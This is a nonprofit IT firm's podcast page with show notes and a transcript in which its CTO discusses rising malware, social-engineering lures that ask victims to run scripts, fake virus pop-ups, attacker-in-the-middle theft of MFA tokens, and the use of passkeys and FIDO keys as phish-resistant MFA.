What Do Nonprofits Need to Know Now About Cybersecurity, Viruses, and Phish-Resistant MFA?
Nonprofit Cybersecurity expert and Community IT CTO Matt Eshleman offered his take on these trends. Listen for expert advice on avoiding new computer viruses and making sure your organization is protected from Attacker-in-the-Middle attacks on MFA (Multi-Factor Authentication), particularly for important accounts like your Executive Director and CFO.
Listen to Podcast
Like podcasts? Find our full archive here or anywhere you listen to podcasts: search Community IT Innovators Nonprofit Technology Topics on Apple, Spotify, Google, Stitcher, Pandora, and more. Or ask your smart speaker.
Takeaways on Cybersecurity, Computer Viruses, and Phish-Resistant MFA
Fighting Viruses
- Virus attacks have been increasing. These computer viruses are no longer just malware that “infects” your network through an email link or website.
- Bad actors know we are suspicious of links in our email and that these days most malicious emails are stopped from reaching our inboxes. As a work around, they have started sending a document with instructions to open the document with a “secure code” – actually a malicious code. In this way, they trick the victim into running the attack against themselves.
- To resist this attack, always think – if the document you need to open is legitimate, and the person emailing it to you is genuine, they can send you a pdf. You should be very suspicious of any attachment that requires another set of steps to open, particularly executing code on your computer.
- Other ways you may pick up a computer virus: downloading something malicious online. Be careful to double check you are on a legitimate site before downloading anything. Better yet, use the App Store where possible.
- We are also seeing an increase in malicious pop-ups. If a window opens on your computer saying you have a virus, it can be scary. Always contact your own IT provider. Do not follow the directions the pop up is giving you to get “support,” or you will be calling the scammer.
Using Phish-Resistant MFA
- Community IT continues to recommend that all users use a Multi-Factor Authentication method on all accounts.
- Because MFA is so effective, it is not surprising that attackers are trying to work around it. In the past few years Attacker-in-the-Middle attacks have been on the rise. In this attack, the bad guys trick a user into “logging in” in a way that exposes their secure token for the attacker to steal. The attacker can then login as the user from a different device and gain access to anything the user has access to.
- Phish-Resistant MFA, like using a passkey or Microsoft Hello, will only allow the MFA to be authenticated from the device where you are. You can also use a physical key like Ubikey or FIDO, which must be present to allow the login.
- Community IT is recommending at a minimum that all accounts with access to sensitive data such as Executive Director, CFO, maybe Board members, the executive team, should use Phish-Resistant MFA to best protect the organization. Of course, any access to your network is a risk, so where possible, investing in Phish-Resistant MFA for all staff is a good investment.
- Training on Phish-Resistant MFA can lessen the friction or feeling that an extra step is required. Most Phish-Resistant MFA is quick to use and easy to learn. Peace of mind is worth it.
In many ways, these new types of attacks just draw attention to the good work we have been doing in security awareness training for staff and leadership. Compared to a few years ago, nonprofit employees are becoming more and more savvy on the ways to protect our organizations against fraud, theft, data breaches, and other cybercrime.
Community IT hopes that building this culture of care at your organization makes it easier for you to update your staff on new threats and scams through your regular training program. If you have questions on security awareness training, reach out and schedule an assessment with Matt.
Presenters
As the Chief Technology Officer at Community IT, Matthew Eshleman leads the team responsible for strategic planning, research, and implementation of the technology platforms used by nonprofit organization clients to be secure and productive. With a deep background in network infrastructure, he fundamentally understands how nonprofit tech works and interoperates both in the office and in the cloud. With extensive experience serving nonprofits, Matt also understands nonprofit culture and constraints, and has a history of implementing cost-effective and secure solutions at the enterprise level.
Matt has over 23 years of expertise in cybersecurity, IT support, team leadership, software selection and research, and client support. Matt is a frequent speaker on cybersecurity topics for nonprofits and has presented at NTEN events, the Inside NGO conference, Nonprofit Risk Management Summit and Credit Builders Alliance Symposium, LGBT MAP Finance Conference, and Tech Forward Conference. He is also the session designer and trainer for TechSoup’s Digital Security course, and our resident Cybersecurity expert
Matt holds dual degrees in Computer Science and Computer Information Systems from Eastern Mennonite University, and an MBA from the Carey School of Business at Johns Hopkins University.
He is available as a speaker on cybersecurity topics affecting nonprofits, including cyber insurance compliance, staff training, and incident response. You can view Matt’s free cybersecurity videos from past webinars here.
Carolyn Woodard is currently head of Marketing and Outreach at Community IT Innovators. She has served many roles at Community IT, from client to project manager to marketing. With over twenty years of experience in the nonprofit world, including as a nonprofit technology project manager and Director of IT at both large and small organizations, Carolyn knows the frustrations and delights of working with technology professionals, accidental techies, executives, and staff to deliver your organization’s mission and keep your IT infrastructure operating. She has a master’s degree in Nonprofit Management from Johns Hopkins University and received her undergraduate degree in English Literature from Williams College.
She was happy to have this podcast conversation with Matt Eshleman about cybersecurity, viruses and phish-resistant MFA for nonprofits.
Ready to get strategic about your IT?
Community IT has been serving nonprofits exclusively for twenty years. We offer Managed IT support services for nonprofits that want to outsource all or part of their IT support and hosted services. For a fixed monthly fee, we provide unlimited remote and on-site help desk support, proactive network management, and ongoing IT planning from a dedicated team of experts in nonprofit-focused IT. And our clients benefit from our IT Business Managers team who will work with you to plan your IT investments and technology roadmap if you don’t have an in-house IT Director.
We constantly research and evaluate new technology to ensure that you get cutting-edge solutions that are tailored to your organization, using standard industry tech tools that don’t lock you into a single vendor or consultant. We don’t treat any aspect of nonprofit IT as if it is too complicated for you to understand. When you are worried about recovering from a cybersecurity incident, you shouldn’t have to worry about understanding your provider.
If you have questions about cybersecurity, incident response planing, or business continuity, you can learn more about our approach and client services and contact us here.
We think your IT vendor should be able to explain everything without jargon or lingo. If you can’t understand your IT management strategy to your own satisfaction, keep asking your questions until you find an outsourced IT provider who will partner with you for well-managed IT.
If you’re ready to gain peace of mind about your IT support, let’s talk.
Transcript
Carolyn Woodard: Welcome everyone to the Community IT Innovators Technology Topics Podcast. I’m Carolyn Woodard, your host, and I’m really excited today to be here with Matthew Eshleman, our CTO and cybersecurity expert at Community IT. And Matt, would you like to introduce yourself?
Matt Eshleman: It’s great to join you today. My name is Matthew Eshleman, and as Carolyn said, I’m the Chief Technology Officer here at Community IT. I’ve been with the company over 20 years, played a lot of different roles during my tenure, and I’m currently focused on our back-end cybersecurity platforms and work with clients on some of the specific training and strategy around cybersecurity initiatives. It’s great to get a chance to talk a little bit more about that today.
Carolyn Woodard: I think you had a couple of topics that are recently in the news and recently coming up that you’d like to talk a little bit more about.
Matt Eshleman: Yeah, exactly. Every year we do our nonprofit incident report, which you can download and find on our website. That’s something that we published a few months ago. Now that we’re well past halfway into 2025, I actually took a look just to see where things are at. I look at year-to-date trends for the cybersecurity incidents that we are responding to as an IT support provider that works with over 200 nonprofit organizations and supports about 8,000 users, just to see where things are at, any different trends or initiatives that we’re seeing.
And one thing did actually pop out as being something new and maybe unexpected.
Rise in Viruses
When I looked at the data that we’re seeing, we do actually have a noticeable spike in the virus activity that we’re seeing on endpoints, which is unique. I would say for many, many years, there was little to none in terms of malicious activity. You know, I would have said at that point the web filters are doing their job, blocking things, email security tools are blocking the ability to download those things.
To see this change was actually really a surprise. I maybe had seen a little bit of it and been like, oh, there’s more virus tickets than I was used to seeing, but actually seeing the numbers was surprising.
Carolyn Woodard: I feel like viruses are like 1990s, don’t you?
Matt Eshleman: Yeah, exactly. And so that’s why it was such a surprise to see the numbers.
Now, I will say, from my perspective, we categorize two different classes of malicious endpoint activity. One thing that we’ve actually seen a pretty high level of that’s really frustrating to deal with and kind of hard to stop would be those malicious browser pop ups.
If you’ve ever been on a website and then all of a sudden you get this pop up that says, your computer has been infected, call this number right away. Or on a Mac, it says it’s detected a virus, here’s the number to call to get service, right?
Those things are really tough to protect against because they use this browser pop up service that a lot of other trusted websites use to provide notifications. There are some downsides to turning that off. It kind of creates a scary situation that people get tricked into calling that number or they’re not able to figure out how to close the browser window because it takes over the whole screen and there’s not an obvious way to close it. So, we have seen that level or that type of attack pretty frequently.
But the virus activity, which we would categorize as actually being malicious software, that’s the stuff that really has increased.
It can be kind of that traditional old school, you know, you download an executable and run it, and it tries to do stuff on your computer. But we are also now seeing what would be called “living off the land attacks” or so-called “fileless malware,” which would be things like, for Windows computers, a PowerShell scripting, where the bad guys are able to get people to attempt to execute this malicious PowerShell. In some cases, they ask people to run it as part of an attachment. And they’ll say, hey, this is a secure file. Here’s the code that you need to run in order for us to have a secure communication, right? And so, they’ll run it that way.
You know, we do have a few clients that are still hosting web servers that are publishing resources or databases and that kind of thing. And so those systems are really getting targeted as well. I think a combination of some legacy on-prem things that aren’t updated to people running this malicious PowerShell and being tricked into it. I think people searching for and trying to download different utilities, that’s a way that these things are getting initiated.
And I do have to wonder if, at the root, maybe some of the reasons why we’re seeing this increase in malicious software, malicious code is due to the continued lower barrier to entry for running malicious software, right? You can throw it into AI, generate some prompts, have some crafty queries, right? Hey, I need a PowerShell script that does X, Y or Z. And now all of a sudden, instead of, the whatever the 1% of people being able to write that malicious software, now it’s 50% of the hackers can write that software. So, all that to say we are seeing more virus activity on endpoints, some of its user initiated.
The good news is, I would say, is that our security tools are really blocking and preventing this. And so, we still haven’t had those cases where there is actual ransomware or something malicious is ultimately executed in all these cases because we have cloud-enabled endpoint protection on all the devices we’re supporting.
You know, we’re getting those alerts into our platform that, hey, like this threat was identified, it’s been blocked, it’s been quarantined. But that number has really been on the rise year after year. Sobe attentive to what you’re doing when you’re browsing. You know, don’t download random software just because it has a good and appealing link. And for those folks that still have that on-prem website, database, software, that really needs to be migrated into an up-to-date and modern platform. Yeah.
Carolyn Woodard: Do you think that, I wonder, too, we’ve been doing so much training with people to be careful about what they’re seeing in their inbox, and we’ve maybe trained people very well to not click on the weird link that’s right in the e-mail, and that’s causing the bad guys to use AI to make something that’s very convincing of like, oh, you need to open this Word document, and to open it, because it’s a secure document, you have to run this little script. Let me give you the code that you should put in and how you should do it.
Then people are just not on their guard or haven’t been on their guard against that. But after listening to this podcast, hopefully everyone is thinking, don’t download random things from the internet, and don’t think that if somebody sends you an email, and there’s another step you have to do to open something, that you should do that extra step.
Matt Eshleman: Yeah, I think that is good advice, and again, something we do see quite often as a method that these attackers are using, right, is that they’re not sending an email that contains a malicious attachment, they’re sending an email that has a link to a malicious attachment, or instructions on how to run that software yourselves.
And so again, those initial messages often will land in people’s inboxes because there’s nothing malicious about the message or the attachment itself, but it’s like one or two steps beyond, then that’s where the trap is sprung, so to speak.
Carolyn Woodard: That makes sense, that we’re doing a good job at both training people around their email, but also in preventing bad emails from getting to them. So, the bad guys are finding other ways to get around it.
And you had another topic you wanted to tell us about, to put us on our guard.
Phish-Resistant MFA
Matt Eshleman: Yeah, well, I guess in the same vein as keeping aware of the changing security landscape, the topic of MFA and multi-factor authentication continues to be relevant. We’ve been talking about multi-factor authentication for many, many years now. And that’s something that we see in our data as we track security incidents year over year.
When we first were tracking account compromises, it was pretty low. And then the number really spiked as I think the shift to the cloud created this opportunity for hackers to steal people’s credentials.
Then as we introduced MFA for the first time that those numbers really dropped. And it was pretty clear to see that the only accounts that were getting compromised were those accounts that lacked MFA protection.
That was true for a couple of years until a few years ago, where we really started to see the rise of these so-called attacker-in-the-middle frameworks or a proxy attack, where the bad guys figured out that they didn’t really actually need to get your password, but they could steal the authentication token that was underlying all of the authentication.
Then they could use that token and use that to connect from a different location and impersonate you as a user.
And so that’s really been the case for the last couple of years as these attacker-in-the-middle frameworks have been very effective at stealing people’s access method and the bad guys are able to take that.
We have seen that Microsoft 365 accounts appear to be targeted more frequently than Google accounts. We haven’t done an exhaustive deep dive on that, but it is pretty clear that we have a lot more Microsoft accounts compromised than we do Google accounts, even taking in that user base difference that we see.
The good news is that there is a way to combat this type of attack, and that’s through the use of, it gets called Phish-Resistant MFA, like it’s referred to as Passkeys or FIDO2, right? There’s a lot of different acronyms that are there, but there’s much more exhaustive and precise technical definitions that you can find out there on the internet.
But essentially, Phish-Resistant MFA ties your authentication to the specific device that you are on when you’re making that authentication, you’re completing that authentication process.
So, whereas in the traditional Microsoft Authenticator, right, you are responding to a number matching prompt or you’re affirming that, hey, yes, this is me logging in. You know, that authentication method can be stolen and moved if you’re going through one of these proxies.
So, the Phish-Resistant MFA says, hey, we’re only going to allow this authentication token to exist when it’s coming from this specific device that we know and trust and have validated.
So that’s an important transition to make, particularly, I think, for users in the organizations that have access to finances, right? Seeing that we’re largely in an opportunistic cybercrime environment where the bad guys are really after money, right? The primary driver of this is cybercrime. You know, they’re after the people that can make the changes to wire payment information, can buy gift cards, can do those things.
So, protecting accounts that are in that category is really important with Phish-Resistant MFA. The good news is that you can do that. It’s a lot easier to do that now than it was several years ago. You know, you can do that with built-in technology in your existing computer.
So, whether that’s a Windows computer, you can use Microsoft Hello to provide Phish-Resistant MFA. If you’re on a Mac, you can use the Trusted Enclave and Touch ID as a way to provide that Phish-Resistant MFA. And Microsoft has even started to add in that Passkey support to the Microsoft Authenticator app on your phone.
So, it does mean that for organizations, right, if you don’t have to buy your staff another app or token or anything, they can use some of the existing tools that they have.
One option would be to use Microsoft Authenticator, enroll it in Passkey support. It is a little clunky, it’s not a perfect and super frictionless, MFA requirement, you have to take a picture, use core code on your phone, right? So, it’s a little, it seems a little clunky, but it does work, it’s very effective, and you know, you don’t have to buy anything else extra.
You know, on the flip side, you can still buy those physical security keys, right? FIDO keys and use that as a secure MFA method. I’d point folks to the YubiKey donation program. They have a donation program geared towards nonprofit organizations. And they will provide those physical keys as a donation if you qualify. Even if you don’t qualify, you can get FIDO keys for $20 to $30, $40 per person.
And so again, if people have those reservations around using their personal phone for work, it’s easy to provide somebody a physical key, just be done with it. And then you’ve got a really strong authentication method that really provides a high level of protection against those opportunistic hackers that are out there.
Carolyn Woodard: Well, I feel like you had said earlier, but we should probably highlight that maybe people on your executive team, your CFO, your executive director, maybe even people on your board who have access to a lot of that sensitive information that you might want to just get them the FIDO keys if they’re not willing to do the other options or just do some training with them, of this is how you use the more secure Phish-Resistant MFA so that you make sure that those people are really protected.
And I do want to just make sure that we say, like back in the day when it was passwords, it was like we would never say, well, they can crack your password, so just don’t use one. You know, like there’s no point. Right.
So, we’ve been saying forever that MFA, you have to have MFA on all your accounts for everything you do. And we still say that. It’s still better than leaving the doors open. We’re just saying, I heard something the other day that said if there’s an option to make a passkey, do it. Like you should be doing that if you’re on a Mac for all of the different options. And then as you said for Microsoft, if you’re using Hello, just use that.
Matt Eshleman: Yeah. And I think folks that are making that transition into passkeys, I think you will find it’s a much lower bar to enter. It makes your authentications faster if you’ve enrolled it. So, I use both a Mac and a PC. The sites that I have that are passkey enrolled are tied to my Touch ID or Windows Hello.
I don’t have to go find my phone and click on this or do that. The device has all of that security information. It’s embedded and I can have that really fast and secure authentication process in a way that actually is faster for me than trying to go back and go to my phone and find the right MFA app that I stored that token in. I think it can be a better and faster method.
Carolyn Woodard: Well, just me personally, I tend to wait a little while and see if this is like really a thing before I start doing it all the time. And the first couple of times I saw passkeys, I was like, well, what is that? Like, I already have the authenticator. Are you trying to trick me?
So, it’s good to know that the passkey, as you said, it’s going to tie your logging in to the device that you’re on so that that can’t be stolen and used by some bad guy in some other location to pretend to be you.
Matt Eshleman: Yeah, exactly.
Carolyn Woodard: Great. Well, thank you so much for your time today, Matt. I really appreciate it. I think these are great tips for our users, both in your nonprofit world and in your personal world as well. When you’re logging in to your bank, if you have an option to make a more secure MFA passkey to log in, it’s always good to be more careful.
Matt Eshleman: Yes, exactly. Just be attentive out there. Be mindful of downloading or executing commands that are given to you by email. And then again, take a look and see what the options are for you to enable passkey support for the systems that you’re accessing.
Carolyn Woodard: Sounds good. Thank you.
Matt Eshleman: Thanks.
Photo by National Institute of Allergy and Infectious Diseases on Unsplash